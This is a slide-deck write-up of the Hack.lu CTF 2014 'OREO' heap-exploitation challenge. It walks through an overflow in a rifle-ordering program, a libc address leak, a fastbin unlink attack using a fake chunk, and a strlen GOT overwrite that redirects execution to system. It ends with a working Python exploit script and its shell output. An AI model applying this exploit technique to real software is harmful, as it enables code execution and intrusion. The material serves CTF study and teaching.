1. The document describes an online rifle ecommerce system called OREO that contains a vulnerability. 2. By adding specially crafted rifle entries, it is possible to leak data and manipulate the heap to gain code execution. 3. The exploitation involves leaking addresses, manipulating the fastbin chain to allocate a fake freed chunk, overwriting the GOT entry for strlen to redirect execution to the system command, and obtaining a shell.

1. OREO
Hack.lu CTF 2014 - Exploiting 400 points
you0708@YOKARO-MON

2. The Original Rifle Company has the most
finest rifles and revolvers in whole
Rodeo City! However their buildings are
pretty secure, so your only chance to get
into their offices is by hacking through
the Original Rifle Ecommerce Online
(OREO) System and steal all those pretty
weapons from the inside! Makes sense
right? Good luck!
nc wildwildweb.fluxfingers.net 1414

3. Welcome to the OREO Original Rifle Ecommerce Online System!
,______________________________________
|_________________,----------._ [____] -,__ __....-----=====
(_(||||||||||||)___________/ |
`----------' OREO [ ))"-, |
"" `, _,--....___ |
`/ """"
What would you like to do?
1. Add new rifle
2. Show added rifles
3. Order selected rifles
4. Leave a Message with your Order
5. Show current stats
6. Exit!
Action: 1
Rifle name: hogehoge
Rifle description: sample rifle
Action: 2
Rifle to be ordered:
===================================
Name: hogehoge
Description: sample rifle
===================================
Action:

4. Analysis

5. Surface Analysis
• file
• ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked
(uses shared libs), for GNU/Linux 2.6.26, stripped
• checksec
• CANARY : ENABLED
• FORTIFY : disabled
• NX : ENABLED
• PIE : disabled
• RELRO : disabled

6. Dynamic Analysis
• We can order rifles
1. Select rifles you want to order
• Need to specify rifle name & description
2. Submit an order for selected rifles
• Can leave a message

7. Static Analysis
• Reverse engineering using IDA

8. • Data structure of the rifle
Static Analysis

9. Static Analysis
• aa_rifle (Size = 0x38)
Offset Size Name
0x00 0x19 description
0x19 0x1B name
0x34 4 last
Fastbins

10. Reference: Heap Chunk
• http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200

11. Reference: Heap Chunk
• http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200

12. Understanding Rifle
Management using GDB
• After adding 2 rifles
• After order size + flag, fd, bk
“A” “a”
“b”“B”
It can be found from 0x0804A288 that
stores address of last rifle

13. • After adding 2 rifles
Heap
Chunk 2
Chunk 1
Understanding Rifle
Management
Rifle 2
0x00000041 (size + flag)
(prev size)
Rifle 1
description
name
0
0x00000041 (size + flag)
(prev size)
description
name
address of Rifle 1

14. • After order
Heap
Chunk 2
Chunk 1
Understanding Rifle
Management
0x00000041 (size + flag)
(prev size)
0x00000041 (size + flag)
(prev size)
0x00000000 (fd)
0x00000000 (bk)
address of Chunk 2 (fd)
0x00000000 (bk)

15. Vulnerability
• Add command
1. Alloc 0x38 bytes heap (new rifle)
2. Connect to previous rifle
3. Input rifle’s name (max 0x38 bytes)
4. Input rifle’s description (max 0x38 bytes)
5. Add rifle counter

16. Vulnerability
• You can do buffer-overflow as below
Rifle
description
name
last
“A” * 0x38

17. Vulnerability
• Or
Rifle
description
name
last“A” * 0x38

18. Exploitation

19. Memory Leakage
• Overwrite last rifle address
Heap
Chunk 1
Rifle 1
description
name
0
0x41 (size + flag)
(prev size)
Target data
You can read target data as rifle’s
description using show command
“A” * 0x1B
+ address of target data

20. Fastbins Unlink Attack
• Breaking fastbins chain
Heap
Freed
Chunk 2
Reallocated
Chunk 1
0x42 (size + flag)
(prev size)
0x41 (size + flag)
(prev size)
address of Chunk 1
bk
Rifle 3
description
name
0
“A” * 0x1F
+ 0
+ 0
+ 0x41
+ address of target memory
Target memory
It used as a heap
chunk after re-
allocating Chunk 2
Add a rifle after free 2
rifles

21. Reference: Fastbins Unlink
Attack
• http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200
To avoid size check failure, you have to
put a correct value into “size”
(In this case, the value must be 0x41)

22. Making Fake Freed Chunk
• You have to find the area that can be set to
0x41 when re-allocation
Chunk
0x41 (size + flag)
(prev size)
fd
bk
You can use 0x804A2A0 as a
freed chunk because
rifle_counter can be set 0x41

23. Exploitation Process
1. Leak address of ibc functions
2. Calc address of “system”
3. Add rifles until rifle counter is 0x3F
4. Order rifles (free fastbins)
5. Breaking fastbins chain by adding a rifle
6. Allocate 0x804A2A0 as a heap chunk by adding a rifle
7. Overwrite GOT by leaving message
8. Get shell

24. Exploitation Process
2. Calc address of “system”
• See http://pastebin.com/9vq38BYH

25. Exploitation Process
3. Add rifles until rifle counter is 0x3F
4. Order rifles (Free fastbins)
while rifle_count < 0x3e:
cmd_add("A"*27+p(0), "B")
cmd_add("A", "B")
cmd_order()
To avoid to create many fast chunks,
the “last” should be 0x00000000

26. Exploitation Process
6. Allocate 0x804A2A0 as a heap chunk by
adding a rifle
• Before allocation, rifle counter will be 0x41
• Its description must be addr of strlen@got
Address Before After
0x804A2A0 orderd_counter prev_size 0x00000000
0x804A2A4 rifle_counter size + flag 0x00000041
0x804A2A8 lpMsg description address of strlen@got
0x804a2c1 msg_buf + 1 name “foobar"
0x804a2dc msg_buf + 0x1C last Unknown
strlen@got is will be call the
program after adding a
rifle/leaving a message

27. Exploitation Process
7. Overwrite strlen@got by leaving a message
• Now lpMsg points to strlen@got
• Message should be p(libc_system) + “;sh
x00"
• “;shx00" will be used in next step

28. Exploitation Process
8. Get shell
• Overwrote strlen will be called after
adding the rifle
• Its argument is the message:
p(libc_system) + “;shx00”
• It means the program will call
system(“x??x??x??x??;sh”)

29. oreo.py
s, f = sock("wildwildweb.fluxfingers.net", 1414)
got_malloc = 0x0804A244
got_strlen = 0x0804A250
p_order_msg = 0x0804A2A8
rifle_count = 0
ready_action()
cmd_add("A"*27+p(got_malloc-0x19), "B"*25)
libc_malloc = u(cmd_show()[1][0][:4])
print("[*] got libc malloc: 0x%08x" % libc_malloc)
libc_system = libc_malloc - 0x0007d950 + 0x00042af0
print("[*] got libc system: 0x%08x" % libc_system)
while rifle_count < 0x3e:
cmd_add("A"*27+p(0), "B")
cmd_add("A", "B")
cmd_order()
cmd_add("A"*27+p(0)+p(0)+p(0x41)+p(p_order_msg-8), "B")
cmd_add("A", "B")
cmd_add("A", p(got_strlen))
cmd_msg(p(libc_system) + ";shx00", noread=True)
print("[*] got shell")
shell(s)

30. $ python oreo.py
[*] rifle count: 0x01
[*] got libc malloc: 0xf76a2950
[*] got libc system: 0xf7667af0
[*] rifle count: 0x02
[*] rifle count: 0x03
(snip.)
[*] rifle count: 0x3f
[*] ordered
[*] rifle count: 0x40
[*] rifle count: 0x41
[*] rifle count: 0x42
[*] got shell
ls
fl4g oreo
cat fl4g
flag{FASTBINS_ARE_NICE_ARENT_THEY}

31. Thank you!